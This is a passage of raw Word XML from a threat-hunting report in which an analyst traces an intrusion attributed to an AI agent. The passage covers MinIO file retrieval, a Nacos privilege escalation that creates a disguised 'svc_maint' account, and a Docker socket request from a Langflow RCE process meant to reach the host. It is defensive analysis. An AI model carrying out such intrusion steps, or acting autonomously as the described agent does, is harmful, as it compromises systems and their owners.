                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="704850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="626DCADB" w:rsidP="40786FAC" w:rsidRDefault="626DCADB" w14:paraId="375B341E" w14:textId="5932A958">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While retrieving files from MinIO, the agent expected to receive data in JSON format but instead received XML. Rather than stopping or requiring human intervention, the agent immediately recognized the issue, adjusted its approach, and retried the request, and then successfully retrieved the file seconds later. This behavior demonstrates autonomous self-correction at machine speed, something a human operator would not be capable of doing without pausing to investigate. This is one of the clearest indicators in the attack chain that the operation was driven by an AI agent rather than a person</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="37C4AB95" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4D097048" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T1078 — Valid Accounts  |  T1611 — Escape to Host</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07459315" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7F4C4BAC" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="36D70F47" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="4EB9639A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="508F9AC9" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="3CD0B8D6" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="42035D9E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="1F38E49A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56C92CFD" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:34:36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28E3E798" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="795FFFC5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="156B129D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>POST /nacos/v1/auth/users HTTP/1.1 403 detail="blank password hash rejected"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="205BA119" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="534E0513" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5831BD0C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D476DBB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxAudit_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DD30456" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ADD_USER — pid=8801 uid=997 UID="nacos" id=svc_maint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="541C0A60" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1AD02239" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0A787685" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25AF14F3" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxContainer_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="010A1106" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GET /containers/json via /var/run/docker.sock src=langflow-rce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6537F28F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DC33FEE" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="463F29E8" wp14:textId="0874DC1A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, I started to look for signs of privilege escalation within the system. To do that, I would need to check the Syslog source to see if there are log entries showing and attempts at escalating privileges. Upon querying for any errors, I can see that the agent started turning its attack towards  the “nacos” server. I can see the first failure, saying that nacos rejected the blank password hash that was submitted by the agent via 403. This was an attempted exploit (specific CVE was not confirmed during the hunt). </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="62CF166E" wp14:anchorId="4C841C20">
            <wp:extent cx="5943600" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11881618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8161872" name="Picture 1188161872"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId857790051">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3067050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F6702B4" w:rsidP="40786FAC" w:rsidRDefault="2F6702B4" w14:paraId="6D6506E9" w14:textId="3A468A1F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="7901AA19" wp14:anchorId="7BFF42E6">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2061714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1714029" name="Picture 2061714029"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1094478936">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="49804B81" wp14:textId="64F641B8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I then narrowed the search within the LinuxAudit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CL table to search for nacos and anything creation- or admin-related. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From the audits I can see 31 seconds later, the agent was able to get an account created under the user “svc_maint”. This was after successfully recomputing the bcrypt hash the server required. The username is also deliberate, because its named to blend in with legit service accounts. The linux audit log captured the PID of 8801 and UID 997</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="2C29A80C" wp14:textId="3B402A61">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="42A2D4BD" wp14:textId="2B2EB531">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I then went and looked a bit deeper and checked the LinuxContainer_CL, to find evidence of a container escape. Within the  logs, I can see the log entry GET /containers/json via /var/run/docker.sock src=langflow-rce. This shows that the agent is sending a request asking Docker to list all running containers on the host. Then it locates the Docker socket, which is a special file which, if located, can be used to control the containers, create new ones, and escape to the host with root privileges. I can also confirm the request came from the langflow RCE process, which would be the attackers code.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="49833BFB" wp14:textId="514E3F34">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="18416D53" wp14:textId="7425ACCC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="64534931" wp14:anchorId="2CC14FC1">
            <wp:extent cx="5943600" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="746596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6596950" name="Picture 746596950"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId410964985">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2647950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="49450F3A" wp14:textId="26D36D5B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="3B7B4B86" wp14:textId="20BF79E9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2CDD23FC" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40786FAC" w:rsidP="40786FAC" w:rsidRDefault="40786FAC" w14:paraId="309FDE28" w14:textId="7541A697">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T1486 — Data Encrypted for Impact  |  T1485 — Data Destruction</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3A0FF5F2" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1A77BA3E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
